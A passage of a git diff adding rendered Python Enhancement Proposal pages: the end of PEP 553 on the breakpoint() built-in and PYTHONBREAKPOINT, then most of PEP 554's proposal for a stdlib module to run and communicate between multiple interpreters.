
+

The signature of the built-in is breakpoint(*args, **kws). The positional +and keyword arguments are passed straight through to sys.breakpointhook() +and the signatures must match or a TypeError will be raised. The return +from sys.breakpointhook() is passed back up to, and returned from +breakpoint().

+

The rationale for this is based on the observation that the underlying +debuggers may accept additional optional arguments. For example, IPython +allows you to specify a string that gets printed when the break point is +entered [ipython-embed]. As of Python 3.7, the pdb module also supports an +optional header argument [pdb-header].

+
+
+

Environment variable

+

The default implementation of sys.breakpointhook() consults a new +environment variable called PYTHONBREAKPOINT. This environment variable +can have various values:

+
    +
  • PYTHONBREAKPOINT=0 disables debugging. Specifically, with this value +sys.breakpointhook() returns None immediately.
  • +
  • PYTHONBREAKPOINT= (i.e. the empty string). This is the same as not +setting the environment variable at all, in which case pdb.set_trace() +is run as usual.
  • +
  • PYTHONBREAKPOINT=some.importable.callable. In this case, +sys.breakpointhook() imports the some.importable module and gets the +callable object from the resulting module, which it then calls. The +value may be a string with no dots, in which case it names a built-in +callable, e.g. PYTHONBREAKPOINT=int. (Guido has expressed the +preference for normal Python dotted-paths, not setuptools-style entry point +syntax [syntax].)
  • +
+

This environment variable allows external processes to control how breakpoints +are handled. Some uses cases include:

+
    +
  • Completely disabling all accidental breakpoint() calls pushed to +production. This could be accomplished by setting PYTHONBREAKPOINT=0 in +the execution environment. Another suggestion by reviewers of the PEP was +to set PYTHONBREAKPOINT=sys.exit in this case.
  • +
  • IDE integration with specialized debuggers for embedded execution. The IDE +would run the program in its debugging environment with PYTHONBREAKPOINT +set to their internal debugging hook.
  • +
+

PYTHONBREAKPOINT is re-interpreted every time sys.breakpointhook() is +reached. This allows processes to change its value during the execution of a +program and have breakpoint() respond to those changes. It is not +considered a performance critical section since entering a debugger by +definition stops execution. Thus, programs can do the following:

+
os.environ['PYTHONBREAKPOINT'] = 'foo.bar.baz'
+breakpoint()    # Imports foo.bar and calls foo.bar.baz()
+
+
+

Overriding sys.breakpointhook defeats the default consultation of +PYTHONBREAKPOINT. It is up to the overriding code to consult +PYTHONBREAKPOINT if they want.

+

If access to the PYTHONBREAKPOINT callable fails in any way (e.g. the +import fails, or the resulting module does not contain the callable), a +RuntimeWarning is issued, and no breakpoint function is called.

+

Note that as with all other PYTHON* environment variables, +PYTHONBREAKPOINT is ignored when the interpreter is started with +-E. This means the default behavior will occur +(i.e. pdb.set_trace() will run). There was some discussion about +alternatively treating PYTHONBREAKPOINT=0 when -E as in +effect, but the opinions were inconclusive, so it was decided that +this wasn’t special enough for a special case.

+
+
+

Implementation

+

A pull request exists with the proposed implementation [impl].

+

While the actual implementation is in C, the Python pseudo-code for this +feature looks roughly like the following:

+
# In builtins.
+def breakpoint(*args, **kws):
+    import sys
+    missing = object()
+    hook = getattr(sys, 'breakpointhook', missing)
+    if hook is missing:
+        raise RuntimeError('lost sys.breakpointhook')
+    return hook(*args, **kws)
+
+# In sys.
+def breakpointhook(*args, **kws):
+    import importlib, os, warnings
+    hookname = os.getenv('PYTHONBREAKPOINT')
+    if hookname is None or len(hookname) == 0:
+        hookname = 'pdb.set_trace'
+    elif hookname == '0':
+        return None
+    modname, dot, funcname = hookname.rpartition('.')
+    if dot == '':
+        modname = 'builtins'
+    try:
+        module = importlib.import_module(modname)
+        hook = getattr(module, funcname)
+    except:
+        warnings.warn(
+            'Ignoring unimportable $PYTHONBREAKPOINT: {}'.format(
+                hookname),
+            RuntimeWarning)
+        return None
+    return hook(*args, **kws)
+
+__breakpointhook__ = breakpointhook
+
+
+
+
+

Rejected alternatives

+
+

A new keyword

+

Originally, the author considered a new keyword, or an extension to an +existing keyword such as break here. This is rejected on several fronts.

+
    +
  • A brand new keyword would require a __future__ to enable it since almost +any new keyword could conflict with existing code. This negates the ease +with which you can enter the debugger.
  • +
  • An extended keyword such as break here, while more readable and not +requiring a __future__ would tie the keyword extension to this new +feature, preventing more useful extensions such as those proposed in +PEP 548.
  • +
  • A new keyword would require a modified grammar and likely a new bytecode. +Each of these makes the implementation more complex. A new built-in breaks +no existing code (since any existing module global would just shadow the +built-in) and is quite easy to implement.
  • +
+
+
+

sys.breakpoint()

+

Why not sys.breakpoint()? Requiring an import to invoke the debugger is +explicitly rejected because sys is not imported in every module. That +just requires more typing and would lead to:

+
import sys; sys.breakpoint()
+
+
+

which inherits several of the problems this PEP aims to solve.

+
+
+
+

Version History

+
    +
  • 2019-10-13
      +
    • Add missing return None in except clause to pseudo-code.
    • +
    +
  • +
  • 2017-09-13
      +
    • The PYTHONBREAKPOINT environment variable is made a first class +feature.
    • +
    +
  • +
  • 2017-09-07
      +
    • debug() renamed to breakpoint()
    • +
    • Signature changed to breakpoint(*args, **kws) which is passed straight +through to sys.breakpointhook().
    • +
    +
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0553.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0554/index.html b/pep-0554/index.html new file mode 100644 index 00000000000..9f3f73d9da4 --- /dev/null +++ b/pep-0554/index.html @@ -0,0 +1,2084 @@ + + + + + + + + PEP 554 – Multiple Interpreters in the Stdlib | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 554 – Multiple Interpreters in the Stdlib

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
05-Sep-2017
+
Python-Version:
+
3.13
+
Post-History:
+
07-Sep-2017, +08-Sep-2017, +13-Sep-2017, +05-Dec-2017, +04-May-2020, +14-Mar-2023, +01-Nov-2023
+
Superseded-By:
+
734
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP effectively continues in a cleaner form in PEP 734. +This PEP is kept as-is for the sake of the various sections of +background information and deferred/rejected ideas that have +been stripped from PEP 734.

+
+
+

Abstract

+

CPython has supported multiple interpreters in the same process (AKA +“subinterpreters”) since version 1.5 (1997). The feature has been +available via the C-API. [c-api] Multiple interpreters operate in +relative isolation from one another, which +facilitates novel alternative approaches to +concurrency.

+

This proposal introduces the stdlib interpreters module. It exposes +the basic functionality of multiple interpreters already provided by the +C-API, along with basic support for communicating between interpreters. +This module is especially relevant since PEP 684 introduced a +per-interpreter GIL in Python 3.12.

+
+
+

Proposal

+

Summary:

+
    +
  • add a new stdlib module: “interpreters”
  • +
  • add concurrent.futures.InterpreterPoolExecutor
  • +
  • help for extension module maintainers
  • +
+
+

The “interpreters” Module

+

The interpreters module will provide a high-level interface +to the multiple interpreter functionality, and wrap a new low-level +_interpreters (in the same way as the threading module). +See the Examples section for concrete usage and use cases.

+

Along with exposing the existing (in CPython) multiple interpreter +support, the module will also support a basic mechanism for +passing data between interpreters. That involves setting “shareable” +objects in the __main__ module of a target subinterpreter. Some +such objects, like os.pipe(), may be used to communicate further. +The module will also provide a minimal implementation of “channels” +as a demonstration of cross-interpreter communication.

+

Note that objects are not shared between interpreters since they are +tied to the interpreter in which they were created. Instead, the +objects’ data is passed between interpreters. See the Shared Data +and API For Communication sections for more details about +sharing/communicating between interpreters.

+
+
+

API summary for interpreters module

+

Here is a summary of the API for the interpreters module. For a +more in-depth explanation of the proposed classes and functions, see +the “interpreters” Module API section below.

+

For creating and using interpreters:

+ + + + + + + + + + + + + + + + + + + + +
signaturedescription
list_all() -> [Interpreter]Get all existing interpreters.
get_current() -> InterpreterGet the currently running interpreter.
get_main() -> InterpreterGet the main interpreter.
create() -> InterpreterInitialize a new (idle) Python interpreter.
+
+

+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
signaturedescription
class InterpreterA single interpreter.
.idThe interpreter’s ID (read-only).
.is_running() -> boolIs the interpreter currently executing code?
.close()Finalize and destroy the interpreter.
.set_main_attrs(**kwargs)Bind “shareable” objects in __main__.
.get_main_attr(name)Get a “shareable” object from __main__.
.exec(src_str, /)
+
Run the given source code in the interpreter
+
(in the current thread).
+
+
+

For communicating between interpreters:

+ + + + + + + + + + + + + + +
signaturedescription
is_shareable(obj) -> Bool
+
Can the object’s data be passed
+
between interpreters?
+
+
create_channel() -> (RecvChannel, SendChannel)
+
Create a new channel for passing
+
data between interpreters.
+
+
+
+
+

concurrent.futures.InterpreterPoolExecutor

+

An executor will be added that extends ThreadPoolExecutor to run +per-thread tasks in subinterpreters. Initially, the only supported +tasks will be whatever Interpreter.exec() takes (e.g. a str +script). However, we may also support some functions, as well as +eventually a separate method for pickling the task and arguments, +to reduce friction (at the expense of performance +for short-running tasks).

+
+
+

Help for Extension Module Maintainers

+

In practice, an extension that implements multi-phase init (PEP 489) +is considered isolated and thus compatible with multiple interpreters. +Otherwise it is “incompatible”.

+

Many extension modules are still incompatible. The maintainers and +users of such extension modules will both benefit when they are updated +to support multiple interpreters. In the meantime, users may become +confused by failures when using multiple interpreters, which could +negatively impact extension maintainers. See Concerns below.

+

To mitigate that impact and accelerate compatibility, we will do the +following:

+
    +
  • be clear that extension modules are not required to support use in +multiple interpreters
  • +
  • raise ImportError when an incompatible module is imported +in a subinterpreter
  • +
  • provide resources (e.g. docs) to help maintainers reach compatibility
  • +
  • reach out to the maintainers of Cython and of the most used extension +modules (on PyPI) to get feedback and possibly provide assistance
  • +
+
+
+
+

Examples

+
+

Run isolated code in current OS thread

+
interp = interpreters.create()
+print('before')
+interp.exec('print("during")')
+print('after')
+
+
+
+
+

Run in a different thread

+
interp = interpreters.create()
+def run():
+    interp.exec('print("during")')
+t = threading.Thread(target=run)
+print('before')
+t.start()
+t.join()
+print('after')
+
+
+
+
+

Pre-populate an interpreter

+
interp = interpreters.create()
+interp.exec(tw.dedent("""
+    import some_lib
+    import an_expensive_module
+    some_lib.set_up()
+    """))
+wait_for_request()
+interp.exec(tw.dedent("""
+    some_lib.handle_request()
+    """))
+
+
+
+
+

Handling an exception

+
interp = interpreters.create()
+try:
+    interp.exec(tw.dedent("""
+        raise KeyError
+        """))
+except interpreters.RunFailedError as exc:
+    print(f"got the error from the subinterpreter: {exc}")
+
+
+
+
+

Re-raising an exception

+
interp = interpreters.create()
+try:
+    try:
+        interp.exec(tw.dedent("""
+            raise KeyError
+            """))
+    except interpreters.RunFailedError as exc:
+        raise exc.__cause__
+except KeyError:
+    print("got a KeyError from the subinterpreter")
+
+
+

Note that this pattern is a candidate for later improvement.

+
+
+

Interact with the __main__ namespace

+
interp = interpreters.create()
+interp.set_main_attrs(a=1, b=2)
+interp.exec(tw.dedent("""
+    res = do_something(a, b)
+    """))
+res = interp.get_main_attr('res')
+
+
+
+
+

Synchronize using an OS pipe

+
interp = interpreters.create()
+r1, s1 = os.pipe()
+r2, s2 = os.pipe()
+
+def task():
+    interp.exec(tw.dedent(f"""
+        import os
+        os.read({r1}, 1)
+        print('during B')
+        os.write({s2}, '')
+        """))
+
+t = threading.thread(target=task)
+t.start()
+print('before')
+os.write(s1, '')
+print('during A')
+os.read(r2, 1)
+print('after')
+t.join()
+
+
+
+
+

Sharing a file descriptor

+
interp = interpreters.create()
+with open('spamspamspam') as infile:
+    interp.set_main_attrs(fd=infile.fileno())
+    interp.exec(tw.dedent(f"""
+        import os
+        for line in os.fdopen(fd):
+            print(line)
+        """))
+
+
+
+
+

Passing objects via pickle

+
interp = interpreters.create()
+r, s = os.pipe()
+interp.exec(tw.dedent(f"""
+    import os
+    import pickle
+    reader = {r}
+    """))
+interp.exec(tw.dedent("""
+        data = b''
+        c = os.read(reader, 1)
+        while c != b'\x00':
+            while c != b'\x00':
+                data += c
+                c = os.read(reader, 1)
+            obj = pickle.loads(data)
+            do_something(obj)
+            c = os.read(reader, 1)
+        """))
+for obj in input:
+    data = pickle.dumps(obj)
+    os.write(s, data)
+    os.write(s, b'\x00')
+os.write(s, b'\x00')
+
+
+
+
+

Capturing an interpreter’s stdout

+
interp = interpreters.create()
+stdout = io.StringIO()
+with contextlib.redirect_stdout(stdout):
+    interp.exec(tw.dedent("""
+        print('spam!')
+        """))
+assert(stdout.getvalue() == 'spam!')
+
+# alternately:
+interp.exec(tw.dedent("""
+    import contextlib, io
+    stdout = io.StringIO()
+    with contextlib.redirect_stdout(stdout):
+        print('spam!')
+    captured = stdout.getvalue()
+    """))
+captured = interp.get_main_attr('captured')
+assert(captured == 'spam!')
+
+
+

A pipe (os.pipe()) could be used similarly.

+
+
+

Running a module

+
interp = interpreters.create()
+main_module = mod_name
+interp.exec(f'import runpy; runpy.run_module({main_module!r})')
+
+
+
+
+

Running as script (including zip archives & directories)

+
interp = interpreters.create()
+main_script = path_name
+interp.exec(f"import runpy; runpy.run_path({main_script!r})")
+
+
+
+
+

Using a channel to communicate

+
tasks_recv, tasks = interpreters.create_channel()
+results, results_send = interpreters.create_channel()
+
+def worker():
+    interp = interpreters.create()
+    interp.set_main_attrs(tasks=tasks_recv, results=results_send)
+    interp.exec(tw.dedent("""
+        def handle_request(req):
+            ...
+
+        def capture_exception(exc):
+            ...
+
+        while True:
+            try:
+                req = tasks.recv()
+            except Exception:
+                # channel closed
+                break
+            try:
+                res = handle_request(req)
+            except Exception as exc:
+                res = capture_exception(exc)
+            results.send_nowait(res)
+        """))
+threads = [threading.Thread(target=worker) for _ in range(20)]
+for t in threads:
+    t.start()
+
+requests = ...
+for req in requests:
+    tasks.send(req)
+tasks.close()
+
+for t in threads:
+    t.join()
+
+
+
+
+

Sharing a memoryview (imagine map-reduce)

+
data, chunksize = read_large_data_set()
+buf = memoryview(data)
+numchunks = (len(buf) + 1) / chunksize
+results = memoryview(b'\0' * numchunks)
+
+tasks_recv, tasks = interpreters.create_channel()
+
+def worker():
+    interp = interpreters.create()
+    interp.set_main_attrs(data=buf, results=results, tasks=tasks_recv)
+    interp.exec(tw.dedent("""
+        while True:
+            try:
+                req = tasks.recv()
+            except Exception:
+                # channel closed
+                break
+            resindex, start, end = req
+            chunk = data[start: end]
+            res = reduce_chunk(chunk)
+            results[resindex] = res
+        """))
+t = threading.Thread(target=worker)
+t.start()
+
+for i in range(numchunks):
+    if not workers_running():
+        raise ...
+    start = i * chunksize
+    end = start + chunksize
+    if end > len(buf):
+        end = len(buf)
+    tasks.send((start, end, i))
+tasks.close()
+t.join()
+
+use_results(results)
+
+
+
+
+
+

Rationale

+

Running code in multiple interpreters provides a useful level of +isolation within the same process. This can be leveraged in a number +of ways. Furthermore, subinterpreters provide a well-defined framework +in which such isolation may extended. (See PEP 684.)

+

Alyssa (Nick) Coghlan explained some of the benefits through a comparison with +multi-processing [benefits]:

+
[I] expect that communicating between subinterpreters is going
+to end up looking an awful lot like communicating between
+subprocesses via shared memory.
+
+The trade-off between the two models will then be that one still
+just looks like a single process from the point of view of the
+outside world, and hence doesn't place any extra demands on the
+underlying OS beyond those required to run CPython with a single
+interpreter, while the other gives much stricter isolation
+(including isolating C globals in extension modules), but also
+demands much more from the OS when it comes to its IPC
+capabilities.
+
+The security risk profiles of the two approaches will also be quite
+different, since using subinterpreters won't require deliberately
+poking holes in the process isolation that operating systems give
+you by default.
+
+
+

CPython has supported multiple interpreters, with increasing levels +of support, since version 1.5. While the feature has the potential +to be a powerful tool, it has suffered from neglect +because the multiple interpreter capabilities are not readily available +directly from Python. Exposing the existing functionality +in the stdlib will help reverse the situation.

+

This proposal is focused on enabling the fundamental capability of +multiple interpreters, isolated from each other, +in the same Python process. This is a +new area for Python so there is relative uncertainly about the best +tools to provide as companions to interpreters. Thus we minimize +the functionality we add in the proposal as much as possible.

+
+

Concerns

+
    +
  • “subinterpreters are not worth the trouble”
  • +
+

Some have argued that subinterpreters do not add sufficient benefit +to justify making them an official part of Python. Adding features +to the language (or stdlib) has a cost in increasing the size of +the language. So an addition must pay for itself.

+

In this case, multiple interpreter support provide a novel concurrency +model focused on isolated threads of execution. Furthermore, they +provide an opportunity for changes in CPython that will allow +simultaneous use of multiple CPU cores (currently prevented +by the GIL–see PEP 684).

+

Alternatives to subinterpreters include threading, async, and +multiprocessing. Threading is limited by the GIL and async isn’t +the right solution for every problem (nor for every person). +Multiprocessing is likewise valuable in some but not all situations. +Direct IPC (rather than via the multiprocessing module) provides +similar benefits but with the same caveat.

+

Notably, subinterpreters are not intended as a replacement for any of +the above. Certainly they overlap in some areas, but the benefits of +subinterpreters include isolation and (potentially) performance. In +particular, subinterpreters provide a direct route to an alternate +concurrency model (e.g. CSP) which has found success elsewhere and +will appeal to some Python users. That is the core value that the +interpreters module will provide.

+
    +
  • “stdlib support for multiple interpreters adds extra burden +on C extension authors”
  • +
+

In the Interpreter Isolation section below we identify ways in +which isolation in CPython’s subinterpreters is incomplete. Most +notable is extension modules that use C globals to store internal +state. (PEP 3121 and PEP 489 provide a solution to that problem, +followed by some extra APIs that improve efficiency, e.g. PEP 573).

+

Consequently, projects that publish extension modules may face an +increased maintenance burden as their users start using subinterpreters, +where their modules may break. This situation is limited to modules +that use C globals (or use libraries that use C globals) to store +internal state. For numpy, the reported-bug rate is one every 6 +months. [bug-rate]

+

Ultimately this comes down to a question of how often it will be a +problem in practice: how many projects would be affected, how often +their users will be affected, what the additional maintenance burden +will be for projects, and what the overall benefit of subinterpreters +is to offset those costs. The position of this PEP is that the actual +extra maintenance burden will be small and well below the threshold at +which subinterpreters are worth it.

+
    +
  • “creating a new concurrency API deserves much more thought and +experimentation, so the new module shouldn’t go into the stdlib +right away, if ever”
  • +
+

Introducing an API for a new concurrency model, like happened with +asyncio, is an extremely large project that requires a lot of careful +consideration. It is not something that can be done as simply as this +PEP proposes and likely deserves significant time on PyPI to mature. +(See Nathaniel’s post on python-dev.)

+

However, this PEP does not propose any new concurrency API. +At most it exposes minimal tools (e.g. subinterpreters, channels) +which may be used to write code that follows patterns associated with +(relatively) new-to-Python concurrency models. +Those tools could also be used as the basis for APIs for such +concurrency models. Again, this PEP does not propose any such API.

+
    +
  • “there is no point to exposing subinterpreters if they still share +the GIL”
  • +
  • “the effort to make the GIL per-interpreter is disruptive and risky”
  • +
+

A common misconception is that this PEP also includes a promise that +interpreters will no longer share the GIL. When that is clarified, +the next question is “what is the point?”. This is already answered +at length in this PEP. Just to be clear, the value lies in:

+
* increase exposure of the existing feature, which helps improve
+  the code health of the entire CPython runtime
+* expose the (mostly) isolated execution of interpreters
+* preparation for per-interpreter GIL
+* encourage experimentation
+
+
+
    +
  • “data sharing can have a negative impact on cache performance +in multi-core scenarios”
  • +
+

(See [cache-line-ping-pong].)

+

This shouldn’t be a problem for now as we have no immediate plans +to actually share data between interpreters, instead focusing +on copying.

+
+
+
+

About Subinterpreters

+
+

Concurrency

+

Concurrency is a challenging area of software development. Decades of +research and practice have led to a wide variety of concurrency models, +each with different goals. Most center on correctness and usability.

+

One class of concurrency models focuses on isolated threads of +execution that interoperate through some message passing scheme. A +notable example is Communicating Sequential Processes [CSP] (upon +which Go’s concurrency is roughly based). The intended isolation +inherent to CPython’s interpreters makes them well-suited +to this approach.

+
+
+

Shared Data

+

CPython’s interpreters are inherently isolated (with caveats +explained below), in contrast to threads. So the same +communicate-via-shared-memory approach doesn’t work. Without an +alternative, effective use of concurrency via multiple interpreters +is significantly limited.

+

The key challenge here is that sharing objects between interpreters +faces complexity due to various constraints on object ownership, +visibility, and mutability. At a conceptual level it’s easier to +reason about concurrency when objects only exist in one interpreter +at a time. At a technical level, CPython’s current memory model +limits how Python objects may be shared safely between interpreters; +effectively, objects are bound to the interpreter in which they were +created. Furthermore, the complexity of object sharing increases as +interpreters become more isolated, e.g. after GIL removal (though this +is mitigated somewhat for some “immortal” objects (see PEP 683).

+

Consequently, the mechanism for sharing needs to be carefully considered. +There are a number of valid solutions, several of which may be +appropriate to support in Python’s stdlib and C-API. Any such solution +is likely to share many characteristics with the others.

+

In the meantime, we propose here a minimal solution +(Interpreter.set_main_attrs()), which sets some precedent for how +objects are shared. More importantly, it facilitates the introduction +of more advanced approaches later and allows them to coexist and cooperate. +In part to demonstrate that, we will provide a basic implementation of +“channels”, as a somewhat more advanced sharing solution.

+

Separate proposals may cover:

+
    +
  • the addition of a public C-API based on the implementation +Interpreter.set_main_attrs()
  • +
  • the addition of other sharing approaches to the “interpreters” module
  • +
+

The fundamental enabling feature for communication is that most objects +can be converted to some encoding of underlying raw data, which is safe +to be passed between interpreters. For example, an int object can +be turned into a C long value, sent to another interpreter, and +turned back into an int object there. As another example, +None may be passed as-is.

+

Regardless, the effort to determine the best way forward here is mostly +outside the scope of this PEP. In the meantime, this proposal describes +a basic interim solution using pipes (os.pipe()), as well as +providing a dedicated capability (“channels”). +See API For Communication below.

+
+
+

Interpreter Isolation

+

CPython’s interpreters are intended to be strictly isolated from each +other. Each interpreter has its own copy of all modules, classes, +functions, and variables. The same applies to state in C, including in +extension modules. The CPython C-API docs explain more. [caveats]

+

However, there are ways in which interpreters do share some state. +First of all, some process-global state remains shared:

+
    +
  • file descriptors
  • +
  • low-level env vars
  • +
  • process memory (though allocators are isolated)
  • +
  • builtin types (e.g. dict, bytes)
  • +
  • singletons (e.g. None)
  • +
  • underlying static module data (e.g. functions) for +builtin/extension/frozen modules
  • +
+

There are no plans to change this.

+

Second, some isolation is faulty due to bugs or implementations that did +not take subinterpreters into account. This includes things like +extension modules that rely on C globals. [cryptography] In these +cases bugs should be opened (some are already):

+ +

Finally, some potential isolation is missing due to the current design +of CPython. Improvements are currently going on to address gaps in this +area:

+
    +
  • extensions using the PyGILState_* API are somewhat incompatible [gilstate]
  • +
+
+
+

Existing Usage

+

Multiple interpreter support has not been a widely used feature. +In fact, there have been only a handful of documented cases of +widespread usage, including +mod_wsgi, +OpenStack Ceph, and +JEP. On the one hand, these cases +provide confidence that existing multiple interpreter support is +relatively stable. On the other hand, there isn’t much of a sample +size from which to judge the utility of the feature.

+
+
+
+

Alternate Python Implementations

+

I’ve solicited feedback from various Python implementors about support +for subinterpreters. Each has indicated that they would be able to +support multiple interpreters in the same process (if they choose to) +without a lot of trouble. Here are the projects I contacted:

+
    +
  • jython ([jython])
  • +
  • ironpython (personal correspondence)
  • +
  • pypy (personal correspondence)
  • +
  • micropython (personal correspondence)
  • +
+
+
+

“interpreters” Module API

+

The module provides the following functions:

+
list_all() -> [Interpreter]
+
+   Return a list of all existing interpreters.
+
+get_current() => Interpreter
+
+   Return the currently running interpreter.
+
+get_main() => Interpreter
+
+   Return the main interpreter.  If the Python implementation
+   has no concept of a main interpreter then return None.
+
+create() -> Interpreter
+
+   Initialize a new Python interpreter and return it.
+   It will remain idle until something is run in it and always
+   run in its own thread.
+
+is_shareable(obj) -> bool:
+
+   Return True if the object may be "shared" between interpreters.
+   This does not necessarily mean that the actual objects will be
+   shared.  Instead, it means that the objects' underlying data will
+   be shared in a cross-interpreter way, whether via a proxy, a
+   copy, or some other means.
+
+
+

The module also provides the following class:

+
class Interpreter(id):
+
+   id -> int:
+
+      The interpreter's ID. (read-only)
+
+   is_running() -> bool:
+
+      Return whether or not the interpreter's "exec()" is currently
+      executing code.  Code running in subthreads is ignored.
+      Calling this on the current interpreter will always return True.
+
+   close():
+
+      Finalize and destroy the interpreter.
+
+      This may not be called on an already running interpreter.
+      Doing so results in a RuntimeError.
+
+   set_main_attrs(iterable_or_mapping, /):
+   set_main_attrs(**kwargs):
+
+      Set attributes in the interpreter's __main__ module
+      corresponding to the given name-value pairs.  Each value
+      must be a "shareable" object and will be converted to a new
+      object (e.g. copy, proxy) in whatever way that object's type
+      defines.  If an attribute with the same name is already set,
+      it will be overwritten.
+
+      This method is helpful for setting up an interpreter before
+      calling exec().
+
+   get_main_attr(name, default=None, /):
+
+      Return the value of the corresponding attribute of the
+      interpreter's __main__ module.  If the attribute isn't set
+      then the default is returned.  If it is set, but the value
+      isn't "shareable" then a ValueError is raised.
+
+      This may be used to introspect the __main__ module, as well
+      as a very basic mechanism for "returning" one or more results
+      from Interpreter.exec().
+
+   exec(source_str, /):
+
+      Run the provided Python source code in the interpreter,
+      in its __main__ module.
+
+      This may not be called on an already running interpreter.
+      Doing so results in a RuntimeError.
+
+      An "interp.exec()" call is similar to a builtin exec() call
+      (or to calling a function that returns None).  Once
+      "interp.exec()" completes, the code that called "exec()"
+      continues executing (in the original interpreter).  Likewise,
+      if there is any uncaught exception then it effectively
+      (see below) propagates into the code where ``interp.exec()``
+      was called.  Like exec() (and threads), but unlike function
+      calls, there is no return value.  If any "return" value from
+      the code is needed, send the data out via a pipe (os.pipe())
+      or channel or other cross-interpreter communication mechanism.
+
+      The big difference from exec() or functions is that
+      "interp.exec()" executes the code in an entirely different
+      interpreter, with entirely separate state.  The interpreters
+      are completely isolated from each other, so the state of the
+      original interpreter (including the code it was executing in
+      the current OS thread) does not affect the state of the target
+      interpreter (the one that will execute the code).  Likewise,
+      the target does not affect the original, nor any of its other
+      threads.
+
+      Instead, the state of the original interpreter (for this thread)
+      is frozen, and the code it's executing code completely blocks.
+      At that point, the target interpreter is given control of the
+      OS thread.  Then, when it finishes executing, the original
+      interpreter gets control back and continues executing.
+
+      So calling "interp.exec()" will effectively cause the current
+      Python thread to completely pause.  Sometimes you won't want
+      that pause, in which case you should make the "exec()" call in
+      another thread.  To do so, add a function that calls
+      "interp.exec()" and then run that function in a normal
+      "threading.Thread".
+
+      Note that the interpreter's state is never reset, neither
+      before "interp.exec()" executes the code nor after.  Thus the
+      interpreter state is preserved between calls to
+      "interp.exec()".  This includes "sys.modules", the "builtins"
+      module, and the internal state of C extension modules.
+
+      Also note that "interp.exec()" executes in the namespace of the
+      "__main__" module, just like scripts, the REPL, "-m", and
+      "-c".  Just as the interpreter's state is not ever reset, the
+      "__main__" module is never reset.  You can imagine
+      concatenating the code from each "interp.exec()" call into one
+      long script.  This is the same as how the REPL operates.
+
+      Supported code: source text.
+
+
+

In addition to the functionality of Interpreter.set_main_attrs(), +the module provides a related way to pass data between interpreters: +channels. See Channels below.

+
+

Uncaught Exceptions

+

Regarding uncaught exceptions in Interpreter.exec(), we noted that +they are “effectively” propagated into the code where interp.exec() +was called. To prevent leaking exceptions (and tracebacks) between +interpreters, we create a surrogate of the exception and its traceback +(see traceback.TracebackException), set it to __cause__ +on a new interpreters.RunFailedError, and raise that.

+

Directly raising (a proxy of) the exception is problematic since it’s +harder to distinguish between an error in the interp.exec() call +and an uncaught exception from the subinterpreter.

+
+
+
+

Interpreter Restrictions

+

Every new interpreter created by interpreters.create() +now has specific restrictions on any code it runs. This includes the +following:

+
    +
  • importing an extension module fails if it does not implement +multi-phase init
  • +
  • daemon threads may not be created
  • +
  • os.fork() is not allowed (so no multiprocessing)
  • +
  • os.exec*() is not allowed +(but “fork+exec”, a la subprocess is okay)
  • +
+

Note that interpreters created with the existing C-API do not have these +restrictions. The same is true for the “main” interpreter, so +existing use of Python will not change.

+

We may choose to later loosen some of the above restrictions or provide +a way to enable/disable granular restrictions individually. Regardless, +requiring multi-phase init from extension modules will always be a +default restriction.

+
+
+

API For Communication

+

As discussed in Shared Data above, multiple interpreter support +is less useful without a mechanism for sharing data (communicating) +between them. Sharing actual Python objects between interpreters, +however, has enough potential problems that we are avoiding support +for that in this proposal. Nor, as mentioned earlier, are we adding +anything more than a basic mechanism for communication.

+

That mechanism is the Interpreter.set_main_attrs() method. +It may be used to set up global variables before Interpreter.exec() +is called. The name-value pairs passed to set_main_attrs() are +bound as attributes of the interpreter’s __main__ module. +The values must be “shareable”. See Shareable Types below.

+

Additional approaches to communicating and sharing objects are enabled +through Interpreter.set_main_attrs(). A shareable object could be +implemented which works like a queue, but with cross-interpreter safety. +In fact, this PEP does include an example of such an approach: channels.

+
+

Shareable Types

+

An object is “shareable” if its type supports shareable instances. +The type must implement a new internal protocol, which is used to +convert an object to interpreter-independent data and then converted +back to an object on the other side. Also see +is_shareable() above.

+

A minimal set of simple, immutable builtin types will be supported +initially, including:

+
    +
  • None
  • +
  • bool
  • +
  • bytes
  • +
  • str
  • +
  • int
  • +
  • float
  • +
+

We will also support a small number of complex types initially:

+ +

Further builtin types may be supported later, complex or not. +Limiting the initial shareable types is a practical matter, reducing +the potential complexity of the initial implementation. There are a +number of strategies we may pursue in the future to expand supported +objects, once we have more experience with interpreter isolation.

+

In the meantime, a separate proposal will discuss making the internal +protocol (and C-API) used by Interpreter.set_main_attrs() public. +With that protocol, support for other types could be added +by extension modules.

+
+

Communicating Through OS Pipes

+

Even without a dedicated object for communication, users may already +use existing tools. For example, one basic approach for sending data +between interpreters is to use a pipe (see os.pipe()):

+
    +
  1. interpreter A calls os.pipe() to get a read/write pair +of file descriptors (both int objects)
  2. +
  3. interpreter A calls interp.set_main_attrs(), binding the read FD +(or embeds it using string formatting)
  4. +
  5. interpreter A calls interp.exec() on interpreter B
  6. +
  7. interpreter A writes some bytes to the write FD
  8. +
  9. interpreter B reads those bytes
  10. +
+

Several of the earlier examples demonstrate this, such as +Synchronize using an OS pipe.

+
+
+
+

Channels

+

The interpreters module will include a dedicated solution for +passing object data between interpreters: channels. They are included +in the module in part to provide an easier mechanism than using +os.pipe() and in part to demonstrate how libraries may take +advantage of Interpreter.set_main_attrs() +and the protocol it uses.

+

A channel is a simplex FIFO. It is a basic, opt-in data sharing +mechanism that draws inspiration from pipes, queues, and CSP’s +channels. [fifo] The main difference from pipes is that channels can +be associated with zero or more interpreters on either end. Like +queues, which are also many-to-many, channels are buffered (though +they also offer methods with unbuffered semantics).

+

Channels have two operations: send and receive. A key characteristic +of those operations is that channels transmit data derived from Python +objects rather than the objects themselves. When objects are sent, +their data is extracted. When the “object” is received in the other +interpreter, the data is converted back into an object owned by that +interpreter.

+

